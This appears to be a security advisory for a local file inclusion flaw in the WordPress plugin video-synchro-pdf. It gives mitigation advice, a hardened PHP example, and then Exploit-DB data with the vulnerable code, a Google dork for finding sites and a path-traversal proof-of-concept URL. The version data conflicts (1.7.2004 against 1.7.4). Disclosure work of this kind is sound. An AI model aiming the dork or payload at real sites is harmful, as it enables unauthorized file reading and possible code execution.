Vendor: video-synchro-pdf
By: Hassan Khan Yusufzai - Splint3r7
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: video-synchro-pdf
Affected Version From: 1.7.2004
Affected Version To: 1.7.2004
Patch Exists: NO
Related CWE:
CPE: a:wordpress:wordpress_plugin:video-synchro-pdf
Metasploit:
Other Scripts:
Platforms Tested: Firefox
Year: 2022

WordPress Plugin video-synchro-pdf 1.7.4 – Local File Inclusion

The WordPress plugin video-synchro-pdf version 1.7.4 is vulnerable to Local File Inclusion. The vulnerable code is in the file video-synchro-pdf/reglages/Menu_Plugins/tout.php, which concatenates the 'p' request parameter into an include() path without validating it, so an attacker can include arbitrary files from the local system. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'p' parameter. This allows the attacker to read the contents of the file and potentially execute arbitrary code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input, here the 'p' parameter, is properly validated and sanitized before being used in any file operation such as include().
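A hardened form of the include from tout.php quoted in the Exploit-DB data on this page, as an added example that is not the plugin's or the advisory author's code: 'p' is matched against an allowlist and the resolved path is confined to the menu directory. The function name `vsp_resolve_menu_page`, the page name `options` and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code). Resolves the menu page to include.
// $baseDir stands for REPERTOIRE_VIDEOSYNCPDF . 'reglages/Menu_Plugins/'.
function vsp_resolve_menu_page(string $baseDir, $requested, array $allowed): string
{
    $default = $baseDir . 'index.php';

    // Missing, empty or non-string input (e.g. ?p[]=x) gets the default page.
    if (!is_string($requested) || $requested === '') {
        return $default;
    }
    // Strict allowlist: traversal sequences, NUL bytes and stream wrappers
    // never match a known page name, so they never reach include().
    if (!in_array($requested, $allowed, true)) {
        return $default;
    }
    // Defence in depth: the canonical path must stay inside the menu directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    return $path;
}

// In tout.php the call would replace both include() branches:
//   include vsp_resolve_menu_page($menuDir, $_GET['p'] ?? null, $allowed);

// Constructed demo: a temporary directory stands in for reglages/Menu_Plugins/.
$dir = sys_get_temp_dir() . '/vsp_demo_' . getmypid() . '/';
@mkdir($dir);
foreach (['index', 'options'] as $name) {
    file_put_contents($dir . $name . '.php', "<?php // $name\n");
}
$allowed = ['options']; // hypothetical page name

// Constructed inputs: a valid page, an empty value, a traversal path, an array.
foreach (['options', '', '../../../../etc/index', ['x']] as $p) {
    $resolved = vsp_resolve_menu_page($dir, $p, $allowed);
    printf("%-28s -> %s\n", json_encode($p, JSON_UNESCAPED_SLASHES), basename($resolved));
}
```

Only `options` resolves to its own file; every other input falls back to `index.php`.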

Exploit-DB raw data:

# Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 26-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/
# Version: 1.7.4
# Tested on: Firefox

# Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php

# Vulnerable Code:

```
<?php
if ($_GET['p']<=NULL) {
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');
}else{
	include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');
}
```

# Proof of Concept:

http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=
<http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]

Contents of index.php: <?php echo "Local file read"; phpinfo(); ?>